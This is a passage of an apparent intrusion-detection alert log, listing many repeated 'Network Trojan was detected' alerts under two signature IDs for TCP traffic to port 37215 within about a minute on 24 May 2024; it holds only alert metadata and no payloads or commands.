              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515578
              SID:2835222
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097383
              SID:2829579
              Source Port:56490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537978
              SID:2829579
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625651
              SID:2829579
              Source Port:57762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374476
              SID:2829579
              Source Port:45628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975735
              SID:2829579
              Source Port:54912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584460
              SID:2835222
              Source Port:49888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426494
              SID:2835222
              Source Port:38978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533333
              SID:2835222
              Source Port:38896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681303
              SID:2835222
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397901
              SID:2835222
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099496
              SID:2829579
              Source Port:55928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775480
              SID:2835222
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040650
              SID:2829579
              Source Port:37068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457767
              SID:2835222
              Source Port:41162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574740
              SID:2835222
              Source Port:39808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536604
              SID:2829579
              Source Port:56954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595429
              SID:2835222
              Source Port:33148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477848
              SID:2829579
              Source Port:43476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831521
              SID:2835222
              Source Port:51578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625611
              SID:2829579
              Source Port:60158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536003
              SID:2829579
              Source Port:52660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234569
              SID:2829579
              Source Port:40024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545437
              SID:2829579
              Source Port:45664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605744
              SID:2835222
              Source Port:38970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574722
              SID:2829579
              Source Port:37914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270464
              SID:2829579
              Source Port:57252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641637
              SID:2835222
              Source Port:59496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538026
              SID:2835222
              Source Port:35740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.706498
              SID:2835222
              Source Port:53678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207150
              SID:2835222
              Source Port:34612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116777
              SID:2835222
              Source Port:55682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241918
              SID:2829579
              Source Port:52154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395004
              SID:2829579
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696114
              SID:2835222
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377216
              SID:2829579
              Source Port:38290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502887
              SID:2835222
              Source Port:33446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100742
              SID:2829579
              Source Port:54752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111325
              SID:2829579
              Source Port:54558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313540
              SID:2835222
              Source Port:36082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433795
              SID:2829579
              Source Port:36218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055720
              SID:2835222
              Source Port:46466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677318
              SID:2829579
              Source Port:45956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079818
              SID:2829579
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103602
              SID:2829579
              Source Port:55990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152858
              SID:2835222
              Source Port:49382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070698
              SID:2835222
              Source Port:38726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821763
              SID:2835222
              Source Port:37186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401561
              SID:2835222
              Source Port:40272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572702
              SID:2835222
              Source Port:37206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861992
              SID:2829579
              Source Port:35462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253709
              SID:2829579
              Source Port:51006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987367
              SID:2835222
              Source Port:52290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575094
              SID:2835222
              Source Port:50188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061404
              SID:2835222
              Source Port:58948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857113
              SID:2829579
              Source Port:51192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194501
              SID:2835222
              Source Port:55874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488277
              SID:2829579
              Source Port:55766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289153
              SID:2829579
              Source Port:46782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122896
              SID:2835222
              Source Port:53452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343537
              SID:2829579
              Source Port:43632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883575
              SID:2835222
              Source Port:41108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519572
              SID:2829579
              Source Port:42784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506446
              SID:2835222
              Source Port:57268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532321
              SID:2835222
              Source Port:57656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624851
              SID:2835222
              Source Port:54522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235601
              SID:2829579
              Source Port:51080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432227
              SID:2829579
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099838
              SID:2829579
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122137
              SID:2829579
              Source Port:51924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586950
              SID:2835222
              Source Port:59756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797185
              SID:2835222
              Source Port:37768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700093
              SID:2829579
              Source Port:55848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283510
              SID:2835222
              Source Port:53870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374060
              SID:2829579
              Source Port:46154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526909
              SID:2835222
              Source Port:59960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663311
              SID:2829579
              Source Port:60884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235724
              SID:2835222
              Source Port:43794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981067
              SID:2829579
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167974
              SID:2829579
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360873
              SID:2835222
              Source Port:36928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918346
              SID:2829579
              Source Port:60496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536535
              SID:2829579
              Source Port:35162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378052
              SID:2835222
              Source Port:45638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536562
              SID:2829579
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596263
              SID:2835222
              Source Port:54052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598390
              SID:2835222
              Source Port:47450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279429
              SID:2835222
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689666
              SID:2835222
              Source Port:55460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494429
              SID:2835222
              Source Port:48568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517445
              SID:2835222
              Source Port:44354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377668
              SID:2829579
              Source Port:51020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449322
              SID:2835222
              Source Port:43668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233716
              SID:2835222
              Source Port:41290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066292
              SID:2829579
              Source Port:48496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374830
              SID:2829579
              Source Port:35394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520291
              SID:2829579
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639722
              SID:2829579
              Source Port:51754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537241
              SID:2835222
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375081
              SID:2829579
              Source Port:59954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485823
              SID:2835222
              Source Port:44034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165163
              SID:2829579
              Source Port:53578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186088
              SID:2829579
              Source Port:56044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394655
              SID:2835222
              Source Port:57836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.105002
              SID:2829579
              Source Port:33256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582570
              SID:2835222
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796195
              SID:2829579
              Source Port:47704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348106
              SID:2835222
              Source Port:33976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364343
              SID:2829579
              Source Port:54170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377205
              SID:2829579
              Source Port:50130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308824
              SID:2835222
              Source Port:40378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375053
              SID:2835222
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585156
              SID:2829579
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636714
              SID:2829579
              Source Port:43678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100868
              SID:2835222
              Source Port:60144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537304
              SID:2835222
              Source Port:55418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542204
              SID:2829579
              Source Port:39606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537132
              SID:2835222
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449160
              SID:2829579
              Source Port:33742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452663
              SID:2829579
              Source Port:32916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103212
              SID:2829579
              Source Port:58670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061561
              SID:2829579
              Source Port:37366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060833
              SID:2829579
              Source Port:39418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530833
              SID:2829579
              Source Port:40640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535155
              SID:2835222
              Source Port:40302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520172
              SID:2829579
              Source Port:39592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638239
              SID:2835222
              Source Port:51158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542375
              SID:2835222
              Source Port:33296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154981
              SID:2829579
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598127
              SID:2835222
              Source Port:50218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396737
              SID:2829579
              Source Port:58840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519430
              SID:2829579
              Source Port:49182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347764
              SID:2829579
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485297
              SID:2829579
              Source Port:37272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634724
              SID:2829579
              Source Port:46614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333985
              SID:2829579
              Source Port:51426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725103
              SID:2835222
              Source Port:36266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.427314
              SID:2835222
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270477
              SID:2835222
              Source Port:60840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988556
              SID:2829579
              Source Port:50834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517972
              SID:2829579
              Source Port:38004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547429
              SID:2835222
              Source Port:35416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368331
              SID:2835222
              Source Port:55298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059656
              SID:2835222
              Source Port:59962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422354
              SID:2829579
              Source Port:45678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355186
              SID:2835222
              Source Port:48826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481564
              SID:2829579
              Source Port:43180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875714
              SID:2835222
              Source Port:57060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154809
              SID:2835222
              Source Port:57736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124016
              SID:2835222
              Source Port:45596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118536
              SID:2829579
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631179
              SID:2835222
              Source Port:47700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477171
              SID:2829579
              Source Port:51384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116535
              SID:2829579
              Source Port:60250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280079
              SID:2829579
              Source Port:39190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661923
              SID:2829579
              Source Port:35142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302989
              SID:2829579
              Source Port:38426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478420
              SID:2835222
              Source Port:56070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396774
              SID:2829579
              Source Port:54240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814707
              SID:2835222
              Source Port:40928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857815
              SID:2835222
              Source Port:33228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098867
              SID:2835222
              Source Port:34524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797617
              SID:2835222
              Source Port:54896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457708
              SID:2829579
              Source Port:51190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533334
              SID:2835222
              Source Port:36174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594851
              SID:2835222
              Source Port:54196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857793
              SID:2829579
              Source Port:41620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625317
              SID:2829579
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837350
              SID:2829579
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519506
              SID:2835222
              Source Port:51856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625677
              SID:2835222
              Source Port:37726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.772882
              SID:2835222
              Source Port:42428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189446
              SID:2835222
              Source Port:39626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694701
              SID:2829579
              Source Port:39718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424097
              SID:2835222
              Source Port:41092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724969
              SID:2835222
              Source Port:57088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429769
              SID:2835222
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067402
              SID:2835222
              Source Port:55642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534305
              SID:2829579
              Source Port:60128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623593
              SID:2829579
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878269
              SID:2835222
              Source Port:39906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.795976
              SID:2835222
              Source Port:42784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624849
              SID:2835222
              Source Port:55192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.772849
              SID:2829579
              Source Port:57062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554137
              SID:2835222
              Source Port:51060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833054
              SID:2835222
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303011
              SID:2829579
              Source Port:49268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535990
              SID:2835222
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485306
              SID:2829579
              Source Port:33602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608141
              SID:2835222
              Source Port:39250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199146
              SID:2835222
              Source Port:49388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099689
              SID:2835222
              Source Port:39830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267759
              SID:2835222
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573236
              SID:2829579
              Source Port:46104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484632
              SID:2829579
              Source Port:57996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761905
              SID:2835222
              Source Port:46000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.699534
              SID:2829579
              Source Port:49766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
